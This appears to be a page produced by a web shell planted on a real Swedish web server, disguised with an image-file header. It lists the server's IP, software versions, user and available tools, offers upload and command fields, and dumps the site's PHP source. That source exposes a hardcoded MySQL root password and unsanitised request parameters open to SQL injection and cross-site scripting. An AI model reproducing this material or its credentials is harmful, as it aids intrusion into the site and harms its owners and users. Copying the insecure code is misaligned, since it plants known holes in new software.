????JFIF??x?x????'403WebShell
403Webshell
Server IP : 79.136.114.73  /  Your IP : 18.222.251.131
Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f
System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64
User : www-data ( 33)
PHP Version : 5.5.9-1ubuntu4.29
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/www.biminfo.se/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/www.biminfo.se/content.php
<?php 
session_start();
	$link = mysql_connect ("localhost", "root", "root123");
	mysql_select_db ("biminfo");
	
	if($_GET['betyg'] != "" && $_SESSION["ss".$_GET['id']] != $_GET['id']){
		
			$sql = "SELECT * FROM tblContent where tblContent.id = ".$_GET['id'];
			$result = mysql_query($sql);
			
			while ($row = mysql_fetch_assoc($result)){
				$betyg = $row['betyg'];
				$klick = $row['klick'];
				
			}
			
			$kl = $klick+1;
			$score = ($_GET['betyg'] + $betyg*$klick)/($klick+1);
			
			/*if($_GET['betyg'] < $betyg){
				$score = ($_GET['betyg']/$klick 0 $betyg)/2;
			}else{
		 		
			}
			
			*/
			
			$sql = "update tblContent set betyg = $score, klick = $kl where tblContent.id = ".$_GET['id'];
			$result = mysql_query($sql);
			
			 $_SESSION["ss".$_GET['id']] = $_GET['id'];
	}
?>


<?php
			
			$sql = "SELECT tblContent.id as id, model,thumb, path,size,color,tblType.type,tblCustomer.customer, linkid, cdesc, betyg, nbrtypes, checked  FROM tblContent, tblType, tblCustomer where tblContent.ctype = tblType.id and tblContent.hide = 0 and tblContent.customerid = tblCustomer.customerid and tblContent.id = ".$_GET['id'];
			$result = mysql_query($sql);

			while ($row = mysql_fetch_assoc($result)){
				$id = $row['id'];
				$model = $row['model'];
				$thumb = $row['thumb'];
				$path = $row['path'];
				$size = $row['size'];
				$color = $row['color'];
				$type = $row['type'];
				$customer = $row['customer'];
				$linkid = $row['linkid'];
				$desc = $row['cdesc'];
				$betyg = $row['betyg'];
				$nbrtype = $row['nbrtypes'];
				$checked = $row['checked'];
			}

			
			?>
<script language="JavaScript" type="text/JavaScript">
<!--
function MM_swapImgRestore() { //v3.0
  var i,x,a=document.MM_sr; for(i=0;a&&i<a.length&&(x=a[i])&&x.oSrc;i++) x.src=x.oSrc;
}

function MM_preloadImages() { //v3.0
  var d=document; if(d.images){ if(!d.MM_p) d.MM_p=new Array();
    var i,j=d.MM_p.length,a=MM_preloadImages.arguments; for(i=0; i<a.length; i++)
    if (a[i].indexOf("#")!=0){ d.MM_p[j]=new Image; d.MM_p[j++].src=a[i];}}
}

function MM_findObj(n, d) { //v4.01
  var p,i,x;  if(!d) d=document; if((p=n.indexOf("?"))>0&&parent.frames.length) {
    d=parent.frames[n.substring(p+1)].document; n=n.substring(0,p);}
  if(!(x=d[n])&&d.all) x=d.all[n]; for (i=0;!x&&i<d.forms.length;i++) x=d.forms[i][n];
  for(i=0;!x&&d.layers&&i<d.layers.length;i++) x=MM_findObj(n,d.layers[i].document);
  if(!x && d.getElementById) x=d.getElementById(n); return x;
}

function MM_swapImage() { //v3.0
  var i,j=0,x,a=MM_swapImage.arguments; document.MM_sr=new Array; for(i=0;i<(a.length-2);i+=3)
   if ((x=MM_findObj(a[i]))!=null){document.MM_sr[j++]=x; if(!x.oSrc) x.oSrc=x.src; x.src=a[i+2];}
}
//-->
</script>
<style type="text/css">
<!--
.style1 {
	font-size: 10px;
	font-family: Verdana, Arial, Helvetica, sans-serif;
}
.te {
	font-family: Verdana, Geneva, sans-serif;
	font-size: 14px;
	font-weight: bold;
}
-->
</style>
<body onLoad="MM_preloadImages('images/1.gif','images/2.gif','images/3.gif','images/5.gif')">
<span class="style33"><?php echo($customer. " - " . $model);?></span><br>
<br>
</span>
<table width="665"  border="0" cellpadding="0" cellspacing="0">
  <tr>
    <td width="130" height="124" valign="top"><img src="<?php echo($thumb);?>" width="100" height="100" border="1"><br>
     
<br>
<?php if($checked == "1"){?><br>
<a href="astacus_riktlinjer20110824.pdf" target="_new"><img src="images/checked.jpg" width="108" height="69" border="0"></a>
<?php }?>


</td>
    <td width="535" valign="top"><table width="507" border="0" align="right" cellpadding="0" cellspacing="0">
      <tr>
        <td><table width="392" border="0" cellspacing="0" cellpadding="0">
            <tr class="style27">
              <td width="110"><strong>Tillverkare:</strong></td>
              <td width="282" height="20"><strong><?php echo($customer);?></strong></td>
            </tr>
            <tr class="style27">
              <td>Namn:</td>
              <td height="20"><?php echo($model);?></td>
            </tr>
            <?php if($size != 0){?>
			<tr class="style27">
              <td>Storlek:</td>
              <td height="20"><?php echo($size);?></td>
            </tr>
			<tr class="style27">
              <td>F&auml;rg:</td>
              <td height="20"><?php echo($color);?></td>
			  </tr>
			<?php }?>
            <?php if($linkid != 0){?>
			  <tr class="style27">
                <td>Produktinfo:</td>
                <td height="20"><a href="http://www.biminfo.se/?productid=<?php echo($linkid);?>" target="_blank">http://www.biminfo.se/?productid=<?php echo($linkid);?></a></td>
              </tr>
              <?php }?>
            <tr class="style27">
              <td>Typ:</td>
              <td height="10"><?php echo($type);?></td>
            </tr>
            <tr class="style27">
              <td valign="top"><br>
                Antal typer i familj:</td>
              <td height="10" valign="top"><br>                <?php echo($nbrtype);?></td>
            </tr>
        </table>
          <span class="style22"><br>
            <br>
            Beskrivning:            </span>
          <table width="399" border="0" cellspacing="0" cellpadding="0">
            <tr>
              <td class="style27"><?php echo($desc);?></td>
              </tr>
          </table>
          <br>
         <span class="style27"> Nedladdningspris: 0 kr.</span> <br>
         <br>
         <hr>
         <span class="style1">L&auml;mna g&auml;rna en kommentar kring den h&auml;r familjen om du ser att vi kan g&ouml;ra n&aring;gra f&ouml;rb&auml;ttringar:</span><br>
         <br>
         <form name="form1" method="post" action="addcomment.php?id=<?php echo($id);?>">
           <table width="400" border="0" cellspacing="0" cellpadding="0">
             <tr>
               <td width="124" valign="top" class="style1">Namn:</td>
               <td width="276" valign="top"><label for="namn"></label>
                 <input name="namn" type="text" id="namn" size="30"></td>
             </tr>
             <tr>
               <td valign="top" class="style1">E-post:</td>
               <td valign="top"><input name="epost" type="text" id="epost" size="30"></td>
             </tr>
             <tr>
               <td valign="top">&nbsp;</td>
               <td valign="top">&nbsp;</td>
             </tr>
             <tr>
               <td valign="top" class="style1">Meddelande:</td>
               <td valign="top"><label for="text"></label>
                 <textarea name="text" id="text" cols="35" rows="5"></textarea></td>
             </tr>
             <tr>
               <td valign="top"><br>
                 <br>
                 <br></td>
               <td valign="top"><p class="style1">S&auml;kerhetsfr&aring;ga:
                 <?php
						$t1 = rand(1,1000);
						$t2 = rand(1,30);
                        echo($t1." + ".$t2." = ");
						$_SESSION['sec'] = $t1+$t2;
                    ?>
                 <input name="sec" type="text" id="sec" size="3">
                 <input type="hidden" name="id" id="id" value="<?php echo($id);?>">
                 <br>
                 <br>
                 <br>
               </p></td>
             </tr>
             <tr>
               <td valign="top">&nbsp;</td>
               <td valign="top"><input type="reset" name="Reset" id="button" value="B&ouml;rja om">
                 <input type="submit" name="button2" id="button2" value="Skicka!"></td>
             </tr>
           </table>
         </form>
         <span class="te"><?php echo($_GET['message']);?></span><br>
         <hr>
         <br>
          <span class="style22"><br>
          </span>
          <p>&nbsp;</p>
          <p></p>
          <p>&nbsp;</p></td>
		  
		  <?php 
		 
		 $pos = strpos($path,"http");
		 
		 if($pos === false){
		 	 $http = false; 
		 }else{
			$http = true;
		 }
		 
		 if($type == "Revit"){
		 	$filename = substr($path,12);
		 }else{
		 	$filename = substr($path,17);
		 }
		 
		 $filename = str_replace(" ","",$filename);
		if($_COOKIE['cookname'] == ""){
		
		 $link = "index.php?page=download&id=$id&filename=$filename&path=$path";
		 $downstr = "Vidare till nedladdning...";
			}else{
				 $link = "download.php?id=$id&filename=$filename&path=$path";
				 	 $downstr = "Ladda ner Revit-fil";
				}
		 
		  ?>
        <td width="116" valign="top"><div align="center"><a href="<?php echo($link);?>" <?php if($http == true){echo("target='_blank'");}?>><img src="images/download_arrow.jpg" width="85" height="84" border="0"><br>
                  <span class="style28"><?php echo($downstr);?> </span></a><span class="style28"> </span></div></td>
      </tr>
    </table>      
    <p class="style22"><br>
      <br>
      <br>
      <br>
      <br>
      <br>
</p></td>
  </tr>
</table>
<hr size="1">
<p>&nbsp;</p>

Youez - 2016 - github.com/yon3zu
LinuXploit